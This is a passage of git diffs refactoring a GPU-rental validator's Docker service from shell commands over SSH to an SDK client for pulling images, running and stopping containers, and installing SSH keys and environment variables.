                     profilers.append(ProfilerStep.since(ProfilerStepName.ADDING_PUBLIC_KEYS, prev_timestamp))

--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -3194,6 +3194,7 @@ class DockerService:
 
                 try:
                     current_step = "docker_run"
+                    await self.stream_log("Creating docker container", "success", log_tag)
                     await self._run_rental_docker_create_with_port_retry(
                         docker_client=docker_client,
                         ssh_client=ssh_client,

--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -835,13 +835,6 @@ class DockerService:
 
         return available_ports, pod_mapping
 
-    @staticmethod
-    def _build_docker_login_command(username: str, password: str) -> str:
-        return (
-            f"echo {shlex.quote(password)} | "
-            f"/usr/bin/docker login --username {shlex.quote(username)} --password-stdin"
-        )
-
     async def execute_and_stream_logs(
         self,
         ssh_client: asyncssh.SSHClientConnection,
@@ -3618,7 +3611,6 @@ class DockerService:
                     private_key=private_key,
                 ) as docker_client,
             ):
-                # await ssh_client.run(f"docker stop {payload.container_name}")
                 try:
                     await docker_client.remove_container(
                         container_name=payload.container_name,
@@ -4120,79 +4112,6 @@ class DockerService:
                     print(f"Error retrieving data for {repo}: {e}")
 
         return all_digests
-
-    async def setup_ssh_access(
-        self,
-        ssh_client: asyncssh.SSHClientConnection,
-        container_name: str,
-        ip_address: str,
-        username: str = "root",
-        port_maps: list[tuple[int, int]] = None,
-    ) -> tuple[bool, str, str]:
-        """Generate an SSH key pair, add the public key to the Docker container, and check SSH connection."""
-
-        my_key = "my_key"
-        private_key, public_key = self.ssh_service.generate_ssh_key(my_key)
-
-        public_key = public_key.decode("utf-8")
-        private_key = private_key.decode("utf-8")
-
-        private_key = self.ssh_service.decrypt_payload(my_key, private_key)
-        pkey = asyncssh.import_private_key(private_key)
-
-        await asyncio.sleep(5)
-
-        command = f"/usr/bin/docker exec {container_name} sh -c 'echo \"{public_key}\" >> /root/.ssh/authorized_keys'"
-
-        result = await ssh_client.run(command)
-        if result.exit_status != 0:
-            log_text = "Error creating docker connection"
-            log_status = "error"
-            logger.error(log_text)
-
-            return False, log_text, log_status
-
-        port = 0
-        for internal, external in port_maps:
-            if internal == 22:
-                port = external
-        # Check SSH connection
-        try:
-            async with asyncssh.connect(
-                host=ip_address,
-                port=port,
-                username=username,
-                client_keys=[pkey],
-                known_hosts=None,
-            ):
-                log_status = "info"
-                log_text = "SSH connection successful!"
-                logger.info(
-                    _m(
-                        log_text,
-                        extra={
-                            "container_name": container_name,
-                            "ip_address": ip_address,
-                            "port_maps": port_maps,
-                        },
-                    )
-                )
-                return True, log_text, log_status
-        except Exception as e:
-            log_text = "SSH connection failed"
-            log_status = "error"
-            logger.error(
-                _m(
-                    log_text,
-                    extra={
-                        "container_name": container_name,
-                        "ip_address": ip_address,
-                        "port_maps": port_maps,
-                        "error": str(e),
-                    },
-                )
-            )
-            return False, log_text, log_status
 
     def _get_preferred_ports(self, initial_port_count: int | None) -> list[int]:
         """Calculate preferred ports based on initial_port_count.

--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -62,7 +62,19 @@ from services.redis_service import (
     RedisService,
 )
 from services.attestation_service import AttestationService, AttestationError
-from services.nvidia_devices import build_gpu_flags
+from services.nvidia_devices import build_gpu_docker_config_for_executor
+from services.rental_docker_sdk import (
+    ContainerExecSpec,
+    ContainerRunSpec,
+    DeviceMount,
+    PortBinding,
+    RentalDockerSdkClient,
+    RentalDockerSdkClientFactory,
+    VolumeMount,
+    build_authorized_keys_exec_spec,
+    build_container_command_argv,
+    build_environment_exec_spec,
+)
 from services.ssh_service import SSHService
 
 logger = logging.getLogger(__name__)
@@ -223,10 +235,14 @@ class DockerService:
         ssh_service: Annotated[SSHService, Depends(SSHService)],
         redis_service: Annotated[RedisService, Depends(RedisService)],
         attestation_service: Annotated[AttestationService, Depends(AttestationService)],
+        rental_docker_client_factory: RentalDockerSdkClientFactory | None = None,
     ):
         self.ssh_service = ssh_service
         self.redis_service = redis_service
         self.attestation_service = attestation_service
+        self.rental_docker_client_factory = (
+            rental_docker_client_factory or RentalDockerSdkClientFactory()
+        )
         self.lock = asyncio.Lock()
         self.logs_queue: list[dict] = []
         self.log_task: asyncio.Task | None = None
@@ -387,6 +403,157 @@ class DockerService:
                     continue
 
                 raise
+
+    async def _run_rental_docker_create_with_port_retry(
+        self,
+        *,
+        docker_client: RentalDockerSdkClient,
+        ssh_client: asyncssh.SSHClientConnection,
+        run_spec: ContainerRunSpec,
+        container_name: str,
+        default_extra: dict,
+        local_volume: str | None = None,
+    ) -> None:
+        deadline = time.monotonic() + _PORT_ALLOCATED_RETRY_BUDGET_SEC
+        attempt = 0
+        vloopback_mount_repair_attempted = False
+        while True:
+            try:
+                await docker_client.run_container(run_spec)
+                return
+            except Exception as exc:
+                if _should_repair_stale_mountpoint(
+                    exc,
+                    local_volume,
+                    vloopback_mount_repair_attempted,
+                ):
+                    vloopback_mount_repair_attempted = True
+                    if await self.repair_stale_vloopback_mountpoint(
+                        ssh_client,
+                        local_volume,
+                        default_extra,
+                    ):
+                        logger.info(
+                            _m(
+                                "VLOOPBACK_STALE_MOUNTPOINT_RETRY",
+                                extra=get_extra_info(
+                                    {**default_extra, "local_volume": local_volume}
+                                ),
+                            )
+                        )
+                        continue
+
+                port_allocation_phrase = next(
+                    (phrase for phrase in _PORT_ALLOCATED_PHRASES if phrase in str(exc)),
+                    None,
+                )
+                port_retry_deadline_expired = time.monotonic() >= deadline
+                port_retry_needed = bool(port_allocation_phrase) and not port_retry_deadline_expired
+                if port_retry_needed:
+                    attempt += 1
+                    logger.info(
+                        _m(
+                            "PORT_ALREADY_ALLOCATED_RETRY",
+                            extra=get_extra_info({
+                                **default_extra,
+                                "attempt": attempt,
+                                "remaining_sec": int(deadline - time.monotonic()),
+                                "sleep_seconds": _PORT_ALLOCATED_RETRY_SLEEP_SEC,
+                                "port_allocation_phrase": port_allocation_phrase,
+                            }),
+                        )
+                    )
+                    await asyncio.sleep(_PORT_ALLOCATED_RETRY_SLEEP_SEC)
+                    await self._remove_failed_rental_container_for_retry(
+                        docker_client=docker_client,
+                        container_name=container_name,
+                        default_extra=default_extra,
+                        warning_event="PORT_RETRY_STALE_RM_FAILED",
+                    )
+                    continue
+
+                raise
+
+    async def _remove_failed_rental_container_for_retry(
+        self,
+        *,
+        docker_client: RentalDockerSdkClient,
+        container_name: str,
+        default_extra: dict,
+        warning_event: str,
+    ) -> None:
+        try:
+            await docker_client.remove_container(
+                container_name=container_name,
+                force=True,
+                remove_volumes=False,
+            )
+        except asyncio.CancelledError:
+            raise
+        except Exception as rm_exc:
+            logger.warning(
+                _m(
+                    warning_event,
+                    extra=get_extra_info({
+                        **default_extra,
+                        "container_name": container_name,
+                        "rm_error": str(rm_exc),
+                    }),
+                )
+            )
+
+    def _build_rental_container_run_spec(
+        self,
+        *,
+        payload: ContainerCreateRequest,
+        container_name: str,
+        custom_options: CustomOptions,
+        port_maps: list[tuple[int, int, int]],
+        local_volume: str,
+        local_volume_path: str,
+        external_volume_name: str | None,
+        gpu_devices,
+        effective_storage_limit_gb: int | None,
+        cpu_count: int | None,
+    ) -> ContainerRunSpec:
+        environment = {
+            key: str(value)
+            for key, value in (custom_options.environment or {}).items()
+            if key and value and key.strip() and str(value).strip()
+        }
+        environment["NVIDIA_DRIVER_CAPABILITIES"] = "all"
+
+        volumes = [VolumeMount(source=local_volume, target=local_volume_path)]
+        if external_volume_name:
+            volumes.append(VolumeMount(source=external_volume_name, target="/mnt"))
+
+        devices = (
+            DeviceMount(path_on_host="/dev/net/tun", path_in_container="/dev/net/tun"),
+            *gpu_devices.device_mounts,
+        )
+
+        return ContainerRunSpec(
+            image=payload.docker_image,
+            name=container_name,
+            command=build_container_command_argv(custom_options.startup_commands),
+            environment=environment,
+            ports=tuple(
+                PortBinding(container_port=docker_port, host_port=internal_port)
+                for docker_port, internal_port, _ in port_maps
+            ),
+            volumes=tuple(volumes),
+            restart_policy="unless-stopped",
+            runtime="sysbox-runc" if payload.is_sysbox else None,
+            cap_add=("NET_ADMIN",),
+            sysctls={"net.ipv4.conf.all.src_valid_mark": "1"},
+            devices=devices,
+            device_requests=gpu_devices.device_requests,
+            cpu_count=cpu_count,
+            memory_gb=payload.memory_gb,
+            storage_limit_gb=effective_storage_limit_gb,
+            shm_size=custom_options.shm_size,
+            entrypoint=custom_options.entrypoint,
+        )
 
     async def _remove_failed_container_for_retry(
         self,
@@ -1224,6 +1391,209 @@ class DockerService:
             )
 
         return success
+
+    async def install_open_ssh_server_and_start_ssh_service_with_rental_docker(
+        self,
+        docker_client: RentalDockerSdkClient,
+        *,
+        container_name: str,
+        log_tag: str,
+        log_extra: dict,
+    ) -> bool:
+        local_script_path = self._ssh_bootstrap_script_path()
+        container_path = IN_CONTAINER_SSH_BOOTSTRAP_PATH
+
+        try:
+            script_content = local_script_path.read_text()
+        except Exception as exc:
+            await self.stream_log("Failed to read SSH bootstrap script", "error", log_tag)
+            logger.warning(
+                _m(
+                    "Failed to read SSH bootstrap script",
+                    extra=get_extra_info({
+                        **log_extra,
+                        "container_name": container_name,
+                        "local_script_path": str(local_script_path),
+                        "error": str(exc),
+                    }),
+                ),
+                exc_info=True,
+            )
+            return False
+
+        create_spec = ContainerExecSpec(
+            container_name=container_name,
+            argv=(
+                "sh",
+                "-c",
+                f"cat > {shlex.quote(container_path)} "
+                f"&& chmod +x {shlex.quote(container_path)}",
+            ),
+            stdin=script_content,
+        )
+        run_spec = ContainerExecSpec(
+            container_name=container_name,
+            argv=("sh", container_path),
+        )
+
+        try:
+            create_result = await docker_client.exec_in_container(create_spec)
+        except Exception as exc:
+            await self.stream_log(
+                "Failed to create SSH bootstrap script in container",
+                "error",
+                log_tag,
+            )
+            logger.warning(
+                _m(
+                    "Failed to create SSH bootstrap script in container",
+                    extra=get_extra_info({
+                        **log_extra,
+                        "container_name": container_name,
+                        "container_path": container_path,
+                        "error": str(exc),
+                    }),
+                ),
+                exc_info=True,
+            )
+            return False
+
+        if create_result.exit_status != 0:
+            await self.stream_log(
+                "Failed to create SSH bootstrap script in container",
+                "error",
+                log_tag,
+            )
+            logger.warning(
+                _m(
+                    "Failed to create SSH bootstrap script in container",
+                    extra=get_extra_info({
+                        **log_extra,
+                        "container_name": container_name,
+                        "container_path": container_path,
+                        "exit_status": create_result.exit_status,
+                        "stdout": create_result.stdout,
+                        "stderr": create_result.stderr,
+                    }),
+                )
+            )
+            return False
+
+        run_result = await docker_client.exec_in_container(run_spec)
+        if run_result.exit_status != 0:
+            await self.stream_log(
+                run_result.stderr or run_result.stdout or "SSH bootstrap script failed",
+                "error",
+                log_tag,
+            )
+            logger.warning(
+                _m(
+                    "SSH bootstrap script finished with errors",
+                    extra=get_extra_info({
+                        **log_extra,
+                        "container_name": container_name,
+                        "exit_status": run_result.exit_status,
+                        "stdout": run_result.stdout,
+                        "stderr": run_result.stderr,
+                    }),
+                )
+            )
+            return False
+
+        return True
+
+    async def add_ssh_public_keys_with_rental_docker(
+        self,
+        docker_client: RentalDockerSdkClient,
+        *,
+        container_name: str,
+        public_keys: list[str] | tuple[str, ...],
+        log_tag: str,
+        log_extra: dict,
+    ) -> None:
+        exec_spec = build_authorized_keys_exec_spec(
+            container_name=container_name,
+            public_keys=public_keys,
+        )
+        result = await docker_client.exec_in_container(exec_spec)
+        if result.exit_status != 0:
+            await self.stream_log(
+                result.stderr or result.stdout or "Failed to add SSH public keys",
+                "error",
+                log_tag,
+            )
+            logger.warning(
+                _m(
+                    "Failed to add SSH public keys",
+                    extra=get_extra_info({
+                        **log_extra,
+                        "container_name": container_name,
+                        "exit_status": result.exit_status,
+                        "stdout": result.stdout,
+                        "stderr": result.stderr,
+                    }),
+                )
+            )
+            raise Exception(
+                "Failed to add SSH public keys: "
+                f"exit_status={result.exit_status}; "
+                f"stderr={result.stderr}; stdout={result.stdout}"
+            )
+
+    async def add_environment_variables_with_rental_docker(
+        self,
+        docker_client: RentalDockerSdkClient,
+        *,
+        container_name: str,
+        environment: dict[str, str] | None,
+        log_tag: str,
+        log_extra: dict,
+    ) -> bool:
+        exec_spec = build_environment_exec_spec(
+            container_name=container_name,
+            environment=environment,
+        )
+        if exec_spec is None:
+            return True
+
+        try:
+            result = await docker_client.exec_in_container(exec_spec)
+        except Exception as exc:
+            await self.stream_log("Failed to set environment variables", "error", log_tag)
+            logger.warning(
+                _m(
+                    "Failed to set environment variables",
+                    extra=get_extra_info({
+                        **log_extra,
+                        "container_name": container_name,
+                        "error": str(exc),
+                    }),
+                ),
+                exc_info=True,
+            )
+            return False
+
+        if result.exit_status != 0:
+            await self.stream_log(
+                result.stderr or result.stdout or "Failed to set environment variables",
+                "error",
+                log_tag,
+            )
+            logger.warning(
+                _m(
+                    "Failed to set environment variables",
+                    extra=get_extra_info({
+                        **log_extra,
+                        "container_name": container_name,
+                        "exit_status": result.exit_status,
+                        "stdout": result.stdout,
+                        "stderr": result.stderr,
+                    }),
+                )
+            )
+            return False
+
+        return True
 
     async def create_s3fs_volume(
         self,
@@ -2352,15 +2722,21 @@ class DockerService:
                 )
 
             current_step = "ssh_connect"
-            async with asyncssh.connect(
-                host=executor_info.address,
-                port=executor_info.ssh_port,
-                username=executor_info.ssh_username,
-                client_keys=[pkey],
-                known_hosts=known_hosts_policy,
-                keepalive_interval=_CREATE_CONTAINER_SSH_KEEPALIVE_INTERVAL_SEC,
-                keepalive_count_max=_CREATE_CONTAINER_SSH_KEEPALIVE_COUNT_MAX,
-            ) as ssh_client:
+            async with (
+                asyncssh.connect(
+                    host=executor_info.address,
+                    port=executor_info.ssh_port,
+                    username=executor_info.ssh_username,
+                    client_keys=[pkey],
+                    known_hosts=known_hosts_policy,
+                    keepalive_interval=_CREATE_CONTAINER_SSH_KEEPALIVE_INTERVAL_SEC,
+                    keepalive_count_max=_CREATE_CONTAINER_SSH_KEEPALIVE_COUNT_MAX,
+                ) as ssh_client,
+                self.rental_docker_client_factory.connect(
+                    executor_info=executor_info,
+                    private_key=private_key,
+                ) as docker_client,
+            ):
                 # Add profiler for ssh connection
                 profilers.append(ProfilerStep.since(ProfilerStepName.SSH_CONNECTION_ESTABLISHED, prev_timestamp))
                 prev_timestamp = now_ms()
@@ -2383,25 +2759,27 @@ class DockerService:
                 # )
                 if payload.docker_username and payload.docker_password:
                     current_step = "docker_login"
-                    command = self._build_docker_login_command(
-                        payload.docker_username, payload.docker_password
-                    )
-                    await self.execute_and_stream_logs(
-                        ssh_client=ssh_client,
-                        command=command,
-                        log_tag=log_tag,
-                        log_text=f"Logging in to Docker registry as {payload.docker_image}",
-                        log_extra=default_extra,
-                        raise_exception=False
-                    )
+                    try:
+                        await docker_client.login(
+                            username=payload.docker_username,
+                            password=payload.docker_password,
+                        )
+                    except Exception as exc:
+                        logger.warning(
+                            _m(
+                                "Docker registry login failed",
+                                extra=get_extra_info({**default_extra, "error": str(exc)}),
+                            ),
+                            exc_info=True,
+                        )
 
                 # Add profiler for docker login
                 profilers.append(ProfilerStep.since(ProfilerStepName.DOCKER_LOGIN, prev_timestamp))
                 prev_timestamp = now_ms()
 
-                # DAH-2211: when `dockerfile_content` is set, build the image
-                # on the executor instead of pulling. Otherwise the existing
-                # `docker pull` path runs byte-identically.
+                # When `dockerfile_content` is set, build the image on the executor
+                # instead of pulling. Otherwise pull the requested image through the
+                # rental Docker SDK client.
                 if is_custom_build:
                     current_step = "docker_build"
                     build_ok, build_failure_step = await self._custom_build_image(
@@ -2433,95 +2811,20 @@ class DockerService:
                     profilers.append(ProfilerStep.since(ProfilerStepName.CUSTOM_DOCKER_BUILD, prev_timestamp))
                     prev_timestamp = now_ms()
                 else:
-                    # DAH-1524: skip the pull when the image is already present
-                    # locally (the executor pre-pulls cached templates). Probe with
-                    # `docker image inspect` (check=False so an absent image yields a
-                    # non-zero exit instead of a raised ProcessError). Fail-open:
-                    # ONLY exit 0 counts as present; anything else (including a probe
-                    # error) falls through to the pull, so the worst case is
-                    # identical to today (we pulled an image we didn't strictly need).
-                    current_step = "docker_image_inspect"
-                    image_present = False
-                    inspect_cmd = (
-                        f"/usr/bin/docker image inspect {payload.docker_image} "
-                        f">/dev/null 2>&1"
-                    )
-                    try:
-                        inspect_result = await ssh_client.run(inspect_cmd, check=False)
-                        image_present = inspect_result.exit_status == 0
-                    except Exception as exc:
-                        image_present = False
-                        logger.warning(
-                            _m(
-                                "docker image inspect probe failed; falling back to pull",
-                                extra=get_extra_info({**default_extra, "error": str(exc)}),
-                            )
-                        )
-
                     current_step = "docker_pull"
-                    if image_present:
-                        logger.info(
-                            _m(
-                                "Skipping docker pull; image already present locally",
-                                extra=get_extra_info(default_extra),
-                            )
-                        )
-                        # Keep the existing step name so before/after Loki queries
-                        # match; the ~0ms duration + "skipped" flag mark the skip.
-                        profilers.append(ProfilerStep.since(ProfilerStepName.DOCKER_PULL, prev_timestamp, skipped=True))
-                        prev_timestamp = now_ms()
-                    else:
-                        command = f"/usr/bin/docker pull {payload.docker_image}"
-                        await self.execute_and_stream_logs(
-                            ssh_client=ssh_client,
-                            command=command,
-                            log_tag=log_tag,
-                            log_text=f"Pulling docker image {payload.docker_image}",
-                            log_extra=default_extra,
-                            timeout=_DOCKER_PULL_TIMEOUT_SECONDS,
-                        )
+                    await self.stream_log(
+                        f"Pulling docker image {payload.docker_image}",
+                        "success",
+                        log_tag,
+                    )
+                    await docker_client.pull(image=payload.docker_image)
 
-                        # Add profiler for docker pull
-                        profilers.append(ProfilerStep.since(ProfilerStepName.DOCKER_PULL, prev_timestamp))
-                        prev_timestamp = now_ms()
-
-                port_flags = " ".join(
-                    [
-                        f"-p {internal_port}:{docker_port}"
-                        for docker_port, internal_port, _ in port_maps
-                    ]
-                )
+                    # Add profiler for docker pull
+                    profilers.append(ProfilerStep.since(ProfilerStepName.DOCKER_PULL, prev_timestamp))
+                    prev_timestamp = now_ms()
 
                 # Get the container path from the first volume
                 local_volume_path = custom_options.volumes[0].split(':')[-1] if custom_options.volumes else '/root'
-                entrypoint_flag = (
-                    f"--entrypoint {custom_options.entrypoint}"
-                    if custom_options
-                    and custom_options.entrypoint
-                    and custom_options.entrypoint.strip()
-                    else ""
-                )
-                shm_size_flag = (
-                    f"--shm-size {custom_options.shm_size}"
-                    if custom_options and custom_options.shm_size
-                    else ""
-                )
-                env_flags = (
-                    " ".join(
-                        [
-                            f"-e '{key}={value}'"
-                            for key, value in custom_options.environment.items()
-                            if key and value and key.strip() and value.strip()
-                        ]
-                        + ["-e NVIDIA_DRIVER_CAPABILITIES=all"]
-                    )
-                    if custom_options and custom_options.environment
-                    else "-e NVIDIA_DRIVER_CAPABILITIES=all"
-                )
-                startup_commands = build_startup_command_args(
-                    custom_options.startup_commands if custom_options else None
-                )
-
                 container_name = self.get_container_name(payload)
                 created_local_volume = False
                 protected_volume_names = set(payload.active_volume_names or [])
@@ -2601,8 +2904,7 @@ class DockerService:
                     profilers.append(ProfilerStep.since(ProfilerStepName.DOCKER_VOLUME_CREATION, prev_timestamp))
                     prev_timestamp = now_ms()
 
-                volume_flag = f"-v {local_volume}:{local_volume_path}"
-
+                external_volume_name = None
                 if external_volume_info:
                     current_step = "external_volume_creation"
                     success, msg = await self.create_s3fs_volume(
@@ -2618,25 +2920,21 @@ class DockerService:
                         # Important: disable sysbox when using s3fs volume because s3fs volume is not supported by sysbox
                         payload.is_sysbox = False
 
-                        volume_flag += f" -v {external_volume_info.name}:/mnt"
+                        external_volume_name = external_volume_info.name
                     else:
                         warnings.append(ContainerWarningCode.ExternalVolumeFailed)
                         profilers.append(ProfilerStep.since(ProfilerStepName.DOCKER_VOLUME_CREATION_FAILED, prev_timestamp))
                         await self.stream_log("S3 volume setup failed", "error", log_tag)
 
-                # Network permission flags (permission to create a network interface inside the container)
-                net_perm_flags = (
-                    "--cap-add=NET_ADMIN "
-                    "--sysctl net.ipv4.conf.all.src_valid_mark=1 "
-                    "--device /dev/net/tun "
-                )
-
-                # GPU flags. --gpus injects userspace libs (libnvidia-ml.so, nvidia-smi);
+                # GPU options. --gpus injects userspace libs (libnvidia-ml.so, nvidia-smi);
                 # explicit --device entries persist the device cgroup across systemd
                 # daemon-reload (cgroup v2 + systemd cgroup driver wipe the transient
                 # nvidia hook program; HostConfig.Devices is reapplied by Docker).
                 current_step = "gpu_flags"
-                gpu_flags = await build_gpu_flags(ssh_client, payload.gpu_uuids) + " "
+                gpu_config = await build_gpu_docker_config_for_executor(
+                    ssh_client,
+                    payload.gpu_uuids,
+                )
 
                 # DAH-1524: build_gpu_flags issues 2-3 serial SSH probes (proc minor
                 # map, shared nodes, and a slow nvidia-smi -q -x fallback). Profile it
@@ -2647,35 +2945,26 @@ class DockerService:
                 # CPU and memory restriction flags
                 # --cpus flag isn't working inside cvm. skip to use it when tdx_quote is present
                 # TODO: remove this when cvm is fixed
-                if executor_info.tdx_quote: 
-                    cpu_flag = ""
-                else:
-                    cpu_flag = f"--cpus {payload.cpu_count} " if payload.cpu_count else ""
-                memory_flag = f"--memory {payload.memory_gb}g " if payload.memory_gb else ""
-                
-                storage_flag = f"--storage-opt size={effective_storage_limit_gb}g " if effective_storage_limit_gb else ""
-
-                command = (
-                    f'/usr/bin/docker run -d '
-                    f'{"--runtime=sysbox-runc " if payload.is_sysbox else ""}'
-                    f'{net_perm_flags} '  # Network permission flags
-                    f'{port_flags} '
-                    f'{volume_flag} '
-                    f'{entrypoint_flag} '
-                    f'{env_flags} '
-                    f'{shm_size_flag} '
-                    f'{gpu_flags} '  # GPU restriction flags
-                    f'{cpu_flag} '  # CPU restriction flags
-                    f'{memory_flag} '  # Memory restriction flags
-                    f'{storage_flag} '  # Storage restriction flags
-                    f'--restart unless-stopped '
-                    f'--name {container_name} '
-                    f'{payload.docker_image} '
-                    f'{startup_commands}'
+                cpu_count = None if executor_info.tdx_quote else payload.cpu_count
+                run_spec = self._build_rental_container_run_spec(
+                    payload=payload,
+                    container_name=container_name,
+                    custom_options=custom_options,
+                    port_maps=port_maps,
+                    local_volume=local_volume,
+                    local_volume_path=local_volume_path,
+                    external_volume_name=external_volume_name,
+                    gpu_devices=gpu_config,
+                    effective_storage_limit_gb=effective_storage_limit_gb,
+                    cpu_count=cpu_count,
                 )
 
-                timeout = 120
-                logger.info(f"Running command: {command} with timeout={timeout}")
+                logger.info(
+                    _m(
+                        "Creating docker container with SDK",
+                        extra=get_extra_info({**default_extra, "container_name": container_name}),
+                    )
+                )
 
                 # DAH-2018: re-check for backend health_check_* / validator
                 # port-test containers immediately before `docker run`. The
@@ -2712,13 +3001,12 @@ class DockerService:
 
                 try:
                     current_step = "docker_run"
-                    await self._run_docker_create_with_port_retry(
+                    await self._run_rental_docker_create_with_port_retry(
+                        docker_client=docker_client,
                         ssh_client=ssh_client,
-                        command=command,
+                        run_spec=run_spec,
                         container_name=container_name,
-                        log_tag=log_tag,
                         default_extra=default_extra,
-                        timeout=timeout,
                         local_volume=local_volume,
                     )
 
@@ -2755,13 +3043,19 @@ class DockerService:
                         log_extra = get_extra_info({
                             **default_extra,
                             "container_name": container_name,
-                            "gpu_flags": gpu_flags,
+                            "gpu_device_mounts": [
+                                device.path_on_host for device in gpu_config.device_mounts
+                            ],
+                            "gpu_device_request_ids": [
+                                list(device_request.device_ids)
+                                for device_request in gpu_config.device_requests
+                            ],
                             "failure_reason": failure_reason[:2000],
                         })
                         if nvidia_signal:
                             logger.error(_m(
                                 "docker run failed with NVIDIA-device-related error — "
-                                "possible regression from build_gpu_flags --device flag set",
+                                "possible regression from GPU device configuration",
                                 extra=log_extra,
                             ))
                         else:
@@ -2807,9 +3101,8 @@ class DockerService:
                                 extra=get_extra_info({**default_extra, "container_name": container_name}),
                             )
                         )
-
-                    ssh_bootstrap_ok = await self.install_open_ssh_server_and_start_ssh_service(
-                        ssh_client=ssh_client,
+                    ssh_bootstrap_ok = await self.install_open_ssh_server_and_start_ssh_service_with_rental_docker(
+                        docker_client=docker_client,
                         container_name=container_name,
                         log_tag=log_tag,
                         log_extra=default_extra,
@@ -2839,23 +3132,23 @@ class DockerService:
 
                     # add rest of public keys
                     current_step = "add_public_keys"
-                    for public_key in payload.user_public_keys:
-                        command = f"/usr/bin/docker exec {container_name} sh -c 'echo \"{public_key}\" >> ~/.ssh/authorized_keys'"
-                        await ssh_client.run(command)
+                    await self.add_ssh_public_keys_with_rental_docker(
+                        docker_client=docker_client,
+                        container_name=container_name,
+                        public_keys=payload.user_public_keys,
+                        log_tag=log_tag,
+                        log_extra=default_extra,
+                    )
 
                     # add environment variables
                     current_step = "set_environment"
-                    if custom_options and custom_options.environment:
-                        for k, v in custom_options.environment.items():
-                            if k and v and k.strip() and str(v).strip():
-                                env_line = f"{k}={v}"
-                                # Execute each variable addition separately for better error handling
-                                script = f'printf "%s\\n" {shlex.quote(env_line)} >> /etc/environment'
-                                command = f"/usr/bin/docker exec {container_name} sh -c {shlex.quote(script)}"
-                                try:
-                                    await ssh_client.run(command)
-                                except Exception as e:
-                                    print(f"Failed to set environment variable {k}: {e}")
+                    await self.add_environment_variables_with_rental_docker(
+                        docker_client=docker_client,
+                        container_name=container_name,
+                        environment=custom_options.environment if custom_options else None,
+                        log_tag=log_tag,
+                        log_extra=default_extra,
+                    )
 
                     # Add profiler for adding public keys
                     profilers.append(ProfilerStep.since(ProfilerStepName.ADDING_PUBLIC_KEYS, prev_timestamp))
@@ -3016,11 +3309,9 @@ class DockerService:
         )
 
         private_key = self.ssh_service.decrypt_payload(keypair.ss58_address, private_key)
-        pkey = asyncssh.import_private_key(private_key)
 
-        known_hosts_policy: asyncssh.SSHKnownHosts | None = None
         try:
-            known_hosts_policy = await self._prepare_known_hosts_policy(
+            await self._prepare_known_hosts_policy(
                 executor_info,
                 payload.miner_hotkey,
                 default_extra,
@@ -3041,23 +3332,42 @@ class DockerService:
                 error_code=FailedContainerErrorCodes.UnknownError,
             )
 
-        async with asyncssh.connect(
-            host=executor_info.address,
-            port=executor_info.ssh_port,
-            username=executor_info.ssh_username,
-            client_keys=[pkey],
-            known_hosts=known_hosts_policy,
-        ) as ssh_client:
-            await ssh_client.run(f"/usr/bin/docker stop {payload.container_name}")
-
-            logger.info(
-                _m(
-                    "Stopped Docker Container",
-                    extra=get_extra_info(
-                        {**default_extra, "container_name": payload.container_name}
-                    ),
+        try:
+            async with self.rental_docker_client_factory.connect(
+                executor_info=executor_info,
+                private_key=private_key,
+            ) as docker_client:
+                await docker_client.stop(container_name=payload.container_name)
+        except Exception as exc:
+            log_text = _m(
+                "Failed stop_container",
+                extra=get_extra_info(
+                    {
+                        **default_extra,
+                        "container_name": payload.container_name,
+                        "error": str(exc),
+                    }
                 ),
             )
+            logger.error(log_text, exc_info=True)
+            return FailedContainerRequest(
+                miner_hotkey=payload.miner_hotkey,
+                executor_id=payload.executor_id,
+                pod_id=payload.pod_id,
+                workload_kind=payload.workload_kind,
+                msg=str(log_text),
+                error_type=FailedContainerErrorTypes.ContainerStopFailed,
+                error_code=FailedContainerErrorCodes.UnknownError,
+            )
+
+        logger.info(
+            _m(
+                "Stopped Docker Container",
+                extra=get_extra_info(
+                    {**default_extra, "container_name": payload.container_name}
+                ),
+            ),
+        )
 
     async def start_container(
         self,
@@ -3083,11 +3393,9 @@ class DockerService:
         )
 
         private_key = self.ssh_service.decrypt_payload(keypair.ss58_address, private_key)
-        pkey = asyncssh.import_private_key(private_key)
 
-        known_hosts_policy: asyncssh.SSHKnownHosts | None = None
         try:
-            known_hosts_policy = await self._prepare_known_hosts_policy(
+            await self._prepare_known_hosts_policy(
                 executor_info,
                 payload.miner_hotkey,
                 default_extra,
@@ -3108,36 +3416,55 @@ class DockerService:
                 error_code=FailedContainerErrorCodes.UnknownError,
             )
 
-        async with asyncssh.connect(
-            host=executor_info.address,
-            port=executor_info.ssh_port,
-            username=executor_info.ssh_username,
-            client_keys=[pkey],
-            known_hosts=known_hosts_policy,
-        ) as ssh_client:
-            await ssh_client.run(f"/usr/bin/docker start {payload.container_name}")
-            ssh_bootstrap_ok = await self.install_open_ssh_server_and_start_ssh_service(
-                ssh_client=ssh_client,
-                container_name=payload.container_name,
-                log_tag=f"start_container_{payload.pod_id}",
-                log_extra=default_extra,
-            )
-            if not ssh_bootstrap_ok:
-                logger.warning(
+        try:
+            async with self.rental_docker_client_factory.connect(
+                executor_info=executor_info,
+                private_key=private_key,
+            ) as docker_client:
+                await docker_client.start(container_name=payload.container_name)
+                ssh_bootstrap_ok = await self.install_open_ssh_server_and_start_ssh_service_with_rental_docker(
+                    docker_client=docker_client,
+                    container_name=payload.container_name,
+                    log_tag=f"start_container_{payload.pod_id}",
+                    log_extra=default_extra,
+                )
+                if not ssh_bootstrap_ok:
+                    logger.warning(
+                        _m(
+                            "Docker container started but SSH bootstrap did not complete cleanly",
+                            extra=get_extra_info(
+                                {**default_extra, "container_name": payload.container_name}
+                            ),
+                        )
+                    )
+                logger.info(
                     _m(
-                        "Docker container started but SSH bootstrap did not complete cleanly",
+                        "Started Docker Container",
                         extra=get_extra_info(
                             {**default_extra, "container_name": payload.container_name}
                         ),
-                    )
-                )
-            logger.info(
-                _m(
-                    "Started Docker Container",
-                    extra=get_extra_info(
-                        {**default_extra, "container_name": payload.container_name}
                     ),
+                )
+        except Exception as exc:
+            log_text = _m(
+                "Failed start_container",
+                extra=get_extra_info(
+                    {
+                        **default_extra,
+                        "container_name": payload.container_name,
+                        "error": str(exc),
+                    }
                 ),
+            )
+            logger.error(log_text, exc_info=True)
+            return FailedContainerRequest(
+                miner_hotkey=payload.miner_hotkey,
+                executor_id=payload.executor_id,
+                pod_id=payload.pod_id,
+                workload_kind=payload.workload_kind,
+                msg=str(log_text),
